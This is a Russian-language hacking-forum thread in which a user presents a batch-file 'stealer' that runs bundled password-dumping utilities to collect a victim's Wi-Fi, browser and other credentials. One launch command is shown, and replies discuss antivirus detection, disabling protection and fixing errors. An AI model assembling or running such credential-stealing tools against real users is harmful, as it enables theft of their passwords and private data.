• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья Стиллер через Bat файл на всё

Bahonrex

Well-known member
02.10.2017
53
23
#1
Опять же всем привет.
В тот раз я показывал как через powersshell украсть пароль от wifi. Но пользователь подником Remir (Спасибо тебе) показал иной путь к этой...
И я решил легкий(супер легкий бат файл) с 8 программами чтоб украсть у жертвы все самое главное.(Конечно есть ещё ряд других программ, которых можно было добавить, но я добавил те которые использую сам).
Вот ссылка на файлы. VT не залил потому что регистрацию надо делать, мне лень и я честный человек_)

Для просмотра контента необходимо: Войти или зарегистрироваться

1)вытаскиваем с архива.
2)запускаем lol.bat.
3)и в папке wifi всё сохраняется
(Я не смог одной программе дать админ права, если вы знаете как это сделать напишите пожалуйста.)
 

Remir

Премиум
05.11.2017
209
323
#2
Приветствую, дружище! :)
Похоже, что по различным причинам, мы с тобой тут практически одни в этой ветке зависаем...
Задумка у тебя неплоха. Но ты кое-чего не учитываешь. Впрочем, по-порядку.
1) У тебя ошибка. Невнимательность. В "бат"-е у тебя первая строка
Код:
start Web.exe /stext wifi/2)Web.txt
а вот приложения такого нет. Ты или забыл, или не переименовал вложенный "экзешник".
2) Ты не учитываешь наличие антивируса в системе. Файлы Fox.exe и NetPass были тут же "прищучены". А на WirelessKeyView высветился запрос на допуск его "куда не надо".
В них нет ничего страшного (оранжевый уровень), но они суют нос в защищаемые файлы известных приложений и конфиденциальные ветки реестра. И это еще при том, что все параметры свой защиты я выстаиваю сам, "ручками", а не оставляю на "рекомендуемых" по причине частой работы с не совсем "безобидным" софтом, у меня параметр защиты системы выставлен в "информировать и блокировать" вместо "автоматически", при котором эти приложения были бы просто тупо удалены.
3) Извини, только я не понял: а на кой ляд тебе данные MUICache и история USB-носителей? Что ты там хочешь найти? Особенно - в последнем. MUICache покажет установленные приложения, но зачем они тебе? Ты ведь атаковать-то будешь извне. А если это не так, так у тебя в данный момент есть локальный доступ, при котором ты хоть "узащищайся", а доступ к нужной информации мало кто сможет скрыть. А при атаке извне тебя будут интересовать не установленный софт, а "дыры" в системе, которые покажет сканер.
Мне кажется, что эти два приложения - никчемные для данной ситуации.
===============================================
Но если закрыть глаза за упущения, то все четко отработало. Я запустил под Try&Decide, отключив антивирус и еще кое-какую защиту и отчет сформировался. Половина, правда, впустую (нулевая информативность), но ты тут не при чем. Просто я пользуюсь качественными portable-браузерами (делаю сам), у которых свои профили AppData и они никак не завязаны на систему, она про их существование и не знает, а потому и соответствующие ветки реестра пустые, и нужных тебе файлов на местах нет.
Отдельное спасибо тебе за напоминание о существовании команды stext )) Я давно ей не пользовался, даже ключи подзабыл.
А в целом - молоток!
 
Последнее редактирование:

mrOkey

Премиум
14.11.2017
323
498
#3
Вы не одни, просто подобное бессмысленно комментировать
 

Remir

Премиум
05.11.2017
209
323
#4
И что это меняет?
просто подобное бессмысленно комментировать
Это кто так решил? Если это персональное мнение, так и не комментируйте.
[doublepost=1514824040,1514823915][/doublepost]Человек заинтересовался и пытается делать что-то своими руками и головой, а не тупо сдувает выложенное. Я считаю, что такое поощрять нужно и растолковывать.
 

mrOkey

Премиум
14.11.2017
323
498
#5
Человек не открыл ничего нового. Вы пишите, что вы одни в ветке. Я говорю о том что нет вы не одни, просто данная статья ничего нового не открывает
 

Remir

Премиум
05.11.2017
209
323
#6
Я констатировал факт. И он был True :), потому что с 12.30 на него никто не ответил.
Наличие людей на форуме я и так вижу, он не для кого не тайна.
 

Bahonrex

Well-known member
02.10.2017
53
23
#7
Человек не открыл ничего нового. Вы пишите, что вы одни в ветке. Я говорю о том что нет вы не одни, просто данная статья ничего нового не открывает
ну для новичка, это что то новое.
и все мы начинаем с малого
[doublepost=1514829990,1514829779][/doublepost]
Приветствую, дружище! :)
Похоже, что по различным причинам, мы с тобой тут практически одни в этой ветке зависаем...
Задумка у тебя неплоха. Но ты кое-чего не учитываешь. Впрочем, по-порядку.
1) У тебя ошибка. Невнимательность. В "бат"-е у тебя первая строка
Код:
start Web.exe /stext wifi/2)Web.txt
а вот приложения такого нет. Ты или забыл, или не переименовал вложенный "экзешник".
2) Ты не учитываешь наличие антивируса в системе. Файлы Fox.exe и NetPass были тут же "прищучены". А на WirelessKeyView высветился запрос на допуск его "куда не надо".
В них нет ничего страшного (оранжевый уровень), но они суют нос в защищаемые файлы известных приложений и конфиденциальные ветки реестра. И это еще при том, что все параметры свой защиты я выстаиваю сам, "ручками", а не оставляю на "рекомендуемых" по причине частой работы с не совсем "безобидным" софтом, у меня параметр защиты системы выставлен в "информировать и блокировать" вместо "автоматически", при котором эти приложения были бы просто тупо удалены.
3) Извини, только я не понял: а на кой ляд тебе данные MUICache и история USB-носителей? Что ты там хочешь найти? Особенно - в последнем. MUICache покажет установленные приложения, но зачем они тебе? Ты ведь атаковать-то будешь извне. А если это не так, так у тебя в данный момент есть локальный доступ, при котором ты хоть "узащищайся", а доступ к нужной информации мало кто сможет скрыть. А при атаке извне тебя будут интересовать не установленный софт, а "дыры" в системе, которые покажет сканер.
Мне кажется, что эти два приложения - никчемные для данной ситуации.
===============================================
Но если закрыть глаза за упущения, то все четко отработало. Я запустил под Try&Decide, отключив антивирус и еще кое-какую защиту и отчет сформировался. Половина, правда, впустую (нулевая информативность), но ты тут не при чем. Просто я пользуюсь качественными portable-браузерами (делаю сам), у которых свои профили AppData и они никак не завязаны на систему, она про их существование и не знает, а потому и соответствующие ветки реестра пустые, и нужных тебе файлов на местах нет.
Отдельное спасибо тебе за напоминание о существовании команды stext )) Я давно ей не пользовался, даже ключи подзабыл.
А в целом - молоток!
Спасибо за твой комментарий )
и учусь на ошибках)
[doublepost=1514830202][/doublepost]
1) У тебя ошибка. Невнимательность. В "бат"-е у тебя первая строка
Код:
start Web.exe /stext wifi/2)Web.txt
а вот приложения такого нет. Ты или забыл, или не переименовал вложенный "экзешник".
я получается забыл закинуть в архив и она удалилась(почему не знаю)
вот с 7zip
Для просмотра контента необходимо: Войти или зарегистрироваться
 

Remir

Премиум
05.11.2017
209
323
#8
она удалилась(почему не знаю)
На YaDisk тоже антивирусы есть - это на будущее :) Или у тебя самого на компе.
Ну, лично мне это не нужно. Смысл я понял, ошибки пояснил. Дерзай дальше. Удачи!
 

orangedao

Премиум
06.12.2017
8
10
#9
Приветствую, друзья, коллеги и просто жители форума.
Я не так давно начал вникать в ИБ и около года изучаю PS and Python.
И для меня как новичка, интересен любой материал. Пусть он и затерт до дыр для кого то, но для меня это новая интересная информация.
К сожалению у меня нет практического опыта во многих вещах, что описывают на форуме. Но любой материал полезен для обучения. А когда обучаешься самостоятельно и тебе помогают найти ошибки-это очень здорово!
Давайте уважать друг друга и с пониманием относится к чужой работе.
Пиши еще! Будет интересно почитать про возможности PS в рамках ИБ и хакинга.
 

w3n0m41k

Well-known member
30.10.2016
55
35
#10
Приветствую, друзья, коллеги и просто жители форума.
Я не так давно начал вникать в ИБ и около года изучаю PS and Python.
И для меня как новичка, интересен любой материал. Пусть он и затерт до дыр для кого то, но для меня это новая интересная информация.
К сожалению у меня нет практического опыта во многих вещах, что описывают на форуме. Но любой материал полезен для обучения. А когда обучаешься самостоятельно и тебе помогают найти ошибки-это очень здорово!
Давайте уважать друг друга и с пониманием относится к чужой работе.

Пиши еще! Будет интересно почитать про возможности PS в рамках ИБ и хакинга.
Полностью с тобой согласен если для когото тут ничего нового то для новичка в статье не смотря на ошибки много чего нового! автор молодец не пожалел ни сил ни времени! а главное сам попытался во всем разобраться!!!!!!
 

andreuno

New member
28.01.2018
1
0
#14
Опять же всем привет.
В тот раз я показывал как через powersshell украсть пароль от wifi. Но пользователь подником Remir (Спасибо тебе) показал иной путь к этой...
И я решил легкий(супер легкий бат файл) с 8 программами чтоб украсть у жертвы все самое главное.(Конечно есть ещё ряд других программ, которых можно было добавить, но я добавил те которые использую сам).
Вот ссылка на файлы. VT не залил потому что регистрацию надо делать, мне лень и я честный человек_)

Для просмотра контента необходимо: Войти или зарегистрироваться

1)вытаскиваем с архива.
2)запускаем lol.bat.
3)и в папке wifi всё сохраняется
(Я не смог одной программе дать админ права, если вы знаете как это сделать напишите пожалуйста.)
Есть вопрос, как туда добвить другие программы от Nir Soft. Пробовал, не получилось. Видимо ты проделовал еще какие-то операции с программи. Желательно написать ответ в ВК, пожалуйста - vk.com/andreuno
 

westman

New member
20.07.2018
4
3
#15
...на vt не залил, потому что лень регистрироваться там...
но, на вирус тотале нет необходимости регаться для залива файла.
 
Вверх Снизу